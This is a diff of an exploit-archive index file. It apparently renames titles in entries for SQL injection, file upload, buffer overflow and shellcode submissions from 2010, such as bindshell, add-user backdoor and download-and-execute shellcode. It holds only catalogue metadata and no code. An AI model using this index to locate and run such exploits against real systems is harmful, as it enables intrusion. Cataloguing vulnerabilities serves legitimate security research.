Creations/UHM - 'artists.asp' SQL Injection",2010-05-22,Ra3cH,asp,webapps,0 12702,platforms/php/webapps/12702.php,"ECShop - search.php SQL Injection",2010-05-22,Jannock,php,webapps,0 12703,platforms/php/webapps/12703.txt,"Recipes Website 1.0 - SQL Injection",2010-05-22,Mr.ThieF,php,webapps,0 @@ -11635,7 +11636,7 @@ id,file,description,date,author,platform,type,port 12746,platforms/php/webapps/12746.txt,"Spaceacre - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall - 'pages.php' SQL Injection",2010-05-26,Newbie_Campuz,php,webapps,0 12749,platforms/php/webapps/12749.txt,"Book Gallery - 'aboutbook.php' SQL Injection",2010-05-26,Mr.P3rfekT,php,webapps,0 -12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) Cross-Site Request Forgery Exploit",2010-05-26,l3D,windows,webapps,0 +12750,platforms/windows/webapps/12750.txt,"RapidWareX 2.0.1 - (WebUI) Cross-Site Request Forgery",2010-05-26,l3D,windows,webapps,0 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0 @@ -11682,7 +11683,7 @@ id,file,description,date,author,platform,type,port 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0 12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0 -12811,platforms/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 +12811,platforms/php/webapps/12811.txt,"osCommerce Online Merchant 2.2 - Arbitrary File Upload",2010-05-30,MasterGipy,php,webapps,0 12812,platforms/php/webapps/12812.txt,"Joomla com_quran - SQL Injection",2010-05-30,r3m1ck,php,webapps,0 12813,platforms/php/webapps/12813.txt,"WsCMS - Multiple SQL Injections",2010-05-31,cyberlog,php,webapps,0 12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge - Local File Inclusion",2010-05-31,akatsuchi,php,webapps,0 @@ -11706,10 +11707,10 @@ id,file,description,date,author,platform,type,port 12848,platforms/php/webapps/12848.txt,"SIMM Management System (SMS) - Local File Inclusion",2010-06-02,AntiSecurity,php,webapps,0 12849,platforms/php/webapps/12849.txt,"slogan design Script - SQL Injection",2010-06-03,Mr.P3rfekT,php,webapps,0 12850,platforms/php/webapps/12850.txt,"Member ID The Fish Index PHP - SQL Injection",2010-06-03,v4lc0m87,php,webapps,0 -12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote Denial of Service/Crash Exploit",2010-06-03,PoisonCode,windows,dos,0 +12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote Denial of Service/Crash",2010-06-03,PoisonCode,windows,dos,0 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Exploit",2010-06-03,b0nd,windows,dos,0 12855,platforms/php/webapps/12855.txt,"phpBazar 2.1.1 stable - Remote File Inclusion",2010-06-03,Sid3^effects,php,webapps,0 -12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 - Remote File Upload",2010-06-03,indoushka,php,webapps,0 +12856,platforms/php/webapps/12856.txt,"osCSS 1.2.1 - Arbitrary File Upload",2010-06-03,indoushka,php,webapps,0 12857,platforms/php/webapps/12857.txt,"E-book Store - Multiple Vulnerabilities (2)",2010-06-03,indoushka,php,webapps,0 12858,platforms/php/webapps/12858.txt,"Article Management System 2.1.2 - Reinstall",2010-06-03,indoushka,php,webapps,0 12859,platforms/php/webapps/12859.txt,"Advneced Management For Services Sites - (File Disclosure) Vulnerabilities",2010-06-03,indoushka,php,webapps,0 @@ -11947,7 +11948,7 @@ id,file,description,date,author,platform,type,port 13463,platforms/lin_x86-64/shellcode/13463.c,"Linux/x86-64 - bindshell port 4444 Shellcode (132 bytes)",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"Linux/x86-64 - execve(/bin/sh) Shellcode (33 bytes)",2006-11-02,hophet,lin_x86-64,shellcode,0 13465,platforms/multiple/shellcode/13465.c,"Linux PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 -13466,platforms/multiple/shellcode/13466.c,"OS-X PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 +13466,platforms/multiple/shellcode/13466.c,"OSX PPC & x86 - execve(_/bin/sh__{_/bin/sh__NULL}_NULL) Shellcode (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 13467,platforms/multiple/shellcode/13467.c,"Linux/x86 & Unix/SPARC & IRIX/MIPS - execve /bin/sh Shellcode (141 bytes)",2004-09-12,dymitri,multiple,shellcode,0 13468,platforms/multiple/shellcode/13468.c,"Linux/x86 & Unix/SPARC - execve /bin/sh Shellcode (80 bytes)",2004-09-12,dymitri,multiple,shellcode,0 13469,platforms/multiple/shellcode/13469.c,"Linux/x86 & bsd/x86 - execve /bin/sh Shellcode (38 bytes)",2004-09-12,dymitri,multiple,shellcode,0 @@ -11959,16 +11960,16 @@ id,file,description,date,author,platform,type,port 13475,platforms/openbsd_x86/shellcode/13475.c,"OpenBSD/x86 - execve(/bin/sh) ( Shellcode 23 bytes)",2006-05-01,hophet,openbsd_x86,shellcode,0 13476,platforms/openbsd_x86/shellcode/13476.c,"OpenBSD/x86 - portbind port 6969 Shellcode (148 bytes)",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 13477,platforms/openbsd_x86/shellcode/13477.c,"OpenBSD/x86 - Add user _w00w00_ (112 Shellcode bytes)",2004-09-26,anonymous,openbsd_x86,shellcode,0 -13478,platforms/osx_ppc/shellcode/13478.c,"OS-X/PPC - sync()_ reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 -13479,platforms/osx_ppc/shellcode/13479.c,"OS-X/PPC - execve(/bin/sh)_ exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 -13480,platforms/osx_ppc/shellcode/13480.c,"OS-X/PPC - Add user _r00t_ Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13481,platforms/osx_ppc/shellcode/13481.c,"OS-X/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13482,platforms/osx_ppc/shellcode/13482.c,"OS-X/PPC - Add inetd backdoor Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13483,platforms/osx_ppc/shellcode/13483.c,"OS-X/PPC - reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13484,platforms/osx_ppc/shellcode/13484.c,"OS-X/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13485,platforms/osx_ppc/shellcode/13485.c,"OS-X/PPC - create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13486,platforms/osx_ppc/shellcode/13486.c,"OS-X/PPC - simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13487,platforms/osx_ppc/shellcode/13487.c,"OS-X/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13478,platforms/osx_ppc/shellcode/13478.c,"OSX/PPC - sync()_ reboot() Shellcode (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 +13479,platforms/osx_ppc/shellcode/13479.c,"OSX/PPC - execve(/bin/sh)_ exit() Shellcode (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 +13480,platforms/osx_ppc/shellcode/13480.c,"OSX/PPC - Add user _r00t_ Shellcode (219 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13481,platforms/osx_ppc/shellcode/13481.c,"OSX/PPC - execve /bin/sh Shellcode (72 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13482,platforms/osx_ppc/shellcode/13482.c,"OSX/PPC - Add inetd backdoor Shellcode (222 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13483,platforms/osx_ppc/shellcode/13483.c,"OSX/PPC - reboot Shellcode (28 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13484,platforms/osx_ppc/shellcode/13484.c,"OSX/PPC - setuid(0) + execve /bin/sh Shellcode (88 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13485,platforms/osx_ppc/shellcode/13485.c,"OSX/PPC - create /tmp/suid Shellcode (122 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13486,platforms/osx_ppc/shellcode/13486.c,"OSX/PPC - simple write() Shellcode (75 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 +13487,platforms/osx_ppc/shellcode/13487.c,"OSX/PPC - execve /usr/X11R6/bin/xterm Shellcode (141 bytes)",2004-09-26,B-r00t,osx_ppc,shellcode,0 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - download and execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0 13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0 @@ -12099,7 +12100,7 @@ id,file,description,date,author,platform,type,port 13731,platforms/lin_x86/shellcode/13731.c,"Linux/x86 - hard / unclean reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13732,platforms/lin_x86/shellcode/13732.c,"Linux/x86 - hard / unclean reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,lin_x86,shellcode,0 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0 -13735,platforms/osx/remote/13735.py,"Apple Mac OS X EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 +13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6 / 3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 @@ -12114,25 +12115,25 @@ id,file,description,date,author,platform,type,port 13745,platforms/php/webapps/13745.txt,"Sphider Script - Remote Code Execution",2010-06-06,XroGuE,php,webapps,0 13746,platforms/php/webapps/13746.txt,"Joomla Component com_searchlog - SQL Injection",2010-06-06,d0lc3,php,webapps,0 13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 -13748,platforms/php/webapps/13748.txt,"Joomla Component com_annonces - Upload",2010-06-06,Sid3^effects,php,webapps,0 +13748,platforms/php/webapps/13748.txt,"Joomla Component com_annonces - Arbitrary File Upload",2010-06-06,Sid3^effects,php,webapps,0 13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 - SQL Injection",2010-06-06,Sid3^effects,php,webapps,0 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System - Local File Inclusion",2010-06-06,AntiSecurity,php,webapps,0 -13751,platforms/php/webapps/13751.txt,"greeting card - Remote Upload",2010-06-06,Mr.Benladen,php,webapps,0 +13751,platforms/php/webapps/13751.txt,"greeting card - Arbitrary File Upload",2010-06-06,Mr.Benladen,php,webapps,0 13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 BookMarks - Cross-Site Request Forgery / Cross-Site Scripting",2010-06-07,"Adam Baldwin",multiple,webapps,0 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local,0 -13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 +13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS - SQL Injection",2010-06-07,Pokeng,php,webapps,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0 -13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' Stack Buffer Overflow DEP Bypass Exploit",2010-06-08,mr_me,php,local,0 +13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' Stack Buffer Overflow DEP Bypass",2010-06-08,mr_me,php,local,0 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQL Injection",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager - SQL Injection",2010-06-08,"L0rd CrusAd3r",php,webapps,0 -13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Upload",2010-06-08,Sid3^effects,php,webapps,0 -13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal - Upload",2010-06-08,Sid3^effects,php,webapps,0 +13772,platforms/php/webapps/13772.txt,"Rayzz Photoz - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0 +13773,platforms/php/webapps/13773.txt,"Holiday Travel Portal - Arbitrary File Upload",2010-06-08,Sid3^effects,php,webapps,0 13774,platforms/hardware/dos/13774.pl,"Motorola SB5101 Hax0rware Rajko HTTPD - Remote Exploit (PoC)",2010-06-08,"Dillon Beresford",hardware,dos,80 13775,platforms/hardware/dos/13775.pl,"Motorola SB5101 - Hax0rware Event Reset Remote Overflow",2010-06-08,"Dillon Beresford",hardware,dos,80 13776,platforms/php/webapps/13776.txt,"Phreebooks 2.0 - Multiple Permanent Cross-Site Scripting",2010-06-08,"Gustavo Sorondo",php,webapps,0 @@ -12140,7 +12141,7 @@ id,file,description,date,author,platform,type,port 13778,platforms/php/webapps/13778.txt,"Phreebooks 2.0 - Directory Traversal",2010-06-08,"Gustavo Sorondo",php,webapps,0 13779,platforms/php/webapps/13779.txt,"Pre Web Host - SQL Injection",2010-06-08,Mr.Benladen,php,webapps,0 13781,platforms/php/webapps/13781.txt,"phpList 2.8.11 - SQL Injection",2010-06-08,d3v1l,php,webapps,0 -13782,platforms/php/webapps/13782.txt,"Image Store - Remote file Upload",2010-06-08,Mr.FireStormm,php,webapps,0 +13782,platforms/php/webapps/13782.txt,"Image Store - Arbitrary File Upload",2010-06-08,Mr.FireStormm,php,webapps,0 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS Haunted House - Directory Listing / SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 13785,platforms/php/webapps/13785.txt,"eLms Pro - SQL Injection / Cross-Site Scripting",2010-06-09,Sid3^effects,php,webapps,0 @@ -12173,7 +12174,7 @@ id,file,description,date,author,platform,type,port 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion",2010-06-10,SwEET-DeViL,php,webapps,0 13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQL Injection / Cross-Site Scripting",2010-06-10,Sid3^effects,php,webapps,0 -13813,platforms/php/webapps/13813.html,"Store Locator - Remote Add Admin Exploit Cross-Site Request Forgery",2010-06-10,JaMbA,php,webapps,0 +13813,platforms/php/webapps/13813.html,"Store Locator - Remote Add Admin / Cross-Site Request Forgery",2010-06-10,JaMbA,php,webapps,0 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS - Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 13815,platforms/asp/webapps/13815.pl,"Netvolution CMS 2.x - SQL Injection Script",2010-06-10,"amquen and krumel",asp,webapps,0 13816,platforms/php/webapps/13816.txt,"Miniweb 2.0 Business Portal and Social Networking Platform - SQL Injection",2010-06-10,"L0rd CrusAd3r",php,webapps,0 @@ -12194,7 +12195,7 @@ id,file,description,date,author,platform,type,port 13832,platforms/php/webapps/13832.txt,"ardeacore 2.2 - Remote File Inclusion",2010-06-11,"cr4wl3r ",php,webapps,0 13833,platforms/php/webapps/13833.txt,"Parallels System Automation (PSA) - Local File Inclusion",2010-06-11,"Pouya Daneshmand",php,webapps,0 13834,platforms/windows/remote/13834.html,"Sygate Personal Firewall 5.6 build 2808 - ActiveX with DEP Bypass",2010-06-11,Lincoln,windows,remote,0 -13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-06-11,eidelweiss,php,webapps,0 +13835,platforms/php/webapps/13835.txt,"DaLogin 2.2 - 'FCKeditor' Arbitrary File Upload",2010-06-11,eidelweiss,php,webapps,0 13836,platforms/windows/dos/13836.py,"SolarWinds 10.4.0.13 - Denial of Service",2010-06-12,Nullthreat,windows,dos,0 13837,platforms/windows/dos/13837.pl,"Media Player Classic 1.3.1774.0 - (mpcpl) Local Denial of Service (PoC)",2010-06-12,R3d-D3V!L,windows,dos,0 13838,platforms/windows/dos/13838.pl,"CP3 Studio PC Version - Denial of Service",2010-06-12,chap0,windows,dos,0 @@ -12208,7 +12209,7 @@ id,file,description,date,author,platform,type,port 13847,platforms/php/webapps/13847.txt,"phpplanner - Cross-Site Scripting / SQL Injection",2010-06-12,anT!-Tr0J4n,php,webapps,0 13848,platforms/php/webapps/13848.txt,"Infront - SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 13849,platforms/php/webapps/13849.txt,"Yamamah 1.0 - SQL Injection",2010-06-12,TheMaStEr,php,webapps,0 -13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison null byte Exploit",2010-06-13,kingcope,multiple,remote,80 +13850,platforms/multiple/remote/13850.pl,"Litespeed Technologies - Web Server Remote Poison Null Byte Exploit",2010-06-13,kingcope,multiple,remote,80 13852,platforms/php/webapps/13852.txt,"PHPplanner PHP Planner 0.4 - Multiple Vulnerabilities",2010-06-13,"cp77fk4r ",php,webapps,0 13853,platforms/linux/remote/13853.pl,"Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan",2010-06-13,anonymous,linux,remote,0 13854,platforms/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",php,webapps,0 @@ -12242,8 +12243,8 @@ id,file,description,date,author,platform,type,port 13889,platforms/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,php,webapps,0 13890,platforms/php/webapps/13890.txt,"EZPX Photoblog 1.2 Beta - Remote File Inclusion",2010-06-16,sh00t0ut,php,webapps,0 13891,platforms/asp/webapps/13891.html,"AspTR EXtended - Cross-Site Request Forgery Bug",2010-06-16,FreWaL,asp,webapps,0 -13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem - Upload",2010-06-16,Sid3^effects,php,webapps,0 -13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-06-16,eidelweiss,php,webapps,0 +13892,platforms/php/webapps/13892.txt,"PHPAuctionSystem - Arbitrary File Upload",2010-06-16,Sid3^effects,php,webapps,0 +13893,platforms/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload",2010-06-16,eidelweiss,php,webapps,0 13894,platforms/php/webapps/13894.txt,"2DayBiz Online Classified System - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,php,webapps,0 13895,platforms/windows/local/13895.py,"Rosoft Audio Converter 4.4.4 - Buffer Overflow",2010-06-16,blake,windows,local,0 13897,platforms/php/webapps/13897.txt,"Real Estate - SQL Injection",2010-06-16,"L0rd CrusAd3r",php,webapps,0 @@ -12256,7 +12257,7 @@ id,file,description,date,author,platform,type,port 13904,platforms/php/webapps/13904.txt,"Planet 1.1 - [Cross-Site Request Forgery] Add Admin Account",2010-06-17,G0D-F4Th3r,php,webapps,0 13905,platforms/windows/local/13905.py,"BlazeDVD 5.1 - '.plf' Stack Buffer Overflow (PoC) (Windows 7 ALSR + DEP Bypass)",2010-06-17,mr_me,windows,local,0 13906,platforms/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",novell,dos,139 -13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow Exploit (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 +13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP & SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13908,platforms/lin_x86-64/shellcode/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",lin_x86-64,shellcode,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 13910,platforms/lin_x86/shellcode/13910.c,"Linux/x86 - Polymorphic Bindport 31337 with setreuid (0_0) Shellcode (131 bytes)",2010-06-17,gunslinger_,lin_x86,shellcode,0 @@ -12272,7 +12273,7 @@ id,file,description,date,author,platform,type,port 13923,platforms/php/webapps/13923.txt,"Joomla Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13925,platforms/php/webapps/13925.txt,"joomla Component ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 13926,platforms/php/webapps/13926.txt,"joomla Component listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,php,webapps,0 -13927,platforms/php/webapps/13927.txt,"MarketSaz - Remote file Upload",2010-06-18,NetQurd,php,webapps,0 +13927,platforms/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps,0 13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 13931,platforms/php/webapps/13931.txt,"KubeLance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0 @@ -12294,7 +12295,7 @@ id,file,description,date,author,platform,type,port 13947,platforms/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13948,platforms/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 13949,platforms/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",php,webapps,0 -13951,platforms/php/webapps/13951.txt,"Joomla Component com_eportfolio - Upload",2010-06-20,Sid3^effects,php,webapps,0 +13951,platforms/php/webapps/13951.txt,"Joomla Component com_eportfolio - Arbitrary File Upload",2010-06-20,Sid3^effects,php,webapps,0 13952,platforms/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",php,webapps,0 13954,platforms/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,php,webapps,0 13955,platforms/php/webapps/13955.txt,"Joomla Template BizWeb com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,php,webapps,0 @@ -12336,8 +12337,8 @@ id,file,description,date,author,platform,type,port 13995,platforms/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,asp,webapps,0 13996,platforms/php/webapps/13996.txt,"Pre Multiple Vendors Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,php,webapps,0 13997,platforms/php/webapps/13997.txt,"Joomla JE Ajax Event Calendar - SQL Injection",2010-06-23,"L0rd CrusAd3r",php,webapps,0 -13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH Universale Buffer Overflow",2010-06-23,Madjix,windows,local,0 -13999,platforms/php/webapps/13999.html,"Software Index - Remote File Upload Exploit",2010-06-23,indoushka,php,webapps,0 +13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' SEH Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0 +13999,platforms/php/webapps/13999.html,"Software Index - Arbitrary File Upload",2010-06-23,indoushka,php,webapps,0 14000,platforms/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,php,webapps,0 14001,platforms/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",multiple,webapps,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - nfs_mount() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 @@ -12382,7 +12383,7 @@ id,file,description,date,author,platform,type,port 14055,platforms/php/webapps/14055.txt,"Joomla Component (com_sef) - Remote File Inclusion",2010-06-26,Li0n-PaL,php,webapps,0 14056,platforms/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,php,webapps,0 14057,platforms/php/webapps/14057.txt,"WordPress Cimy Counter Plugin - Exploit",2010-06-26,sebug,php,webapps,0 -14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Remote Upload File Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 +14058,platforms/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload Exploit",2010-06-26,Net.Edit0r,aix,webapps,0 14059,platforms/php/webapps/14059.txt,"Joomla JE Awd Song Component - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,php,webapps,0 14060,platforms/php/webapps/14060.txt,"Joomla JE Media Player Component - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 14085,platforms/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,php,webapps,0 @@ -12391,7 +12392,7 @@ id,file,description,date,author,platform,type,port 14062,platforms/php/webapps/14062.txt,"Joomla JE Event Calendar - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 14063,platforms/php/webapps/14063.txt,"Joomla JE Job Component com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 14064,platforms/php/webapps/14064.txt,"Joomla Component JE Section Finder - Local File Inclusion",2010-06-26,Sid3^effects,php,webapps,0 -14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow Exploit (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0 +14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0 14073,platforms/php/webapps/14073.txt,"2DayBiz Matrimonial Script - smartresult.php SQL Injection",2010-06-27,"Easy Laster",php,webapps,0 14070,platforms/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",php,webapps,0 14071,platforms/windows/dos/14071.pl,"FoxPlayer 2 - '.m3u' Local Buffer Overflow (PoC)",2010-06-26,Madjix,windows,dos,0 @@ -12408,12 +12409,12 @@ id,file,description,date,author,platform,type,port 14083,platforms/linux/dos/14083.pl,"Scite Text Editor 1.76 - Local Buffer Overflow (PoC)",2010-06-27,kmkz,linux,dos,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 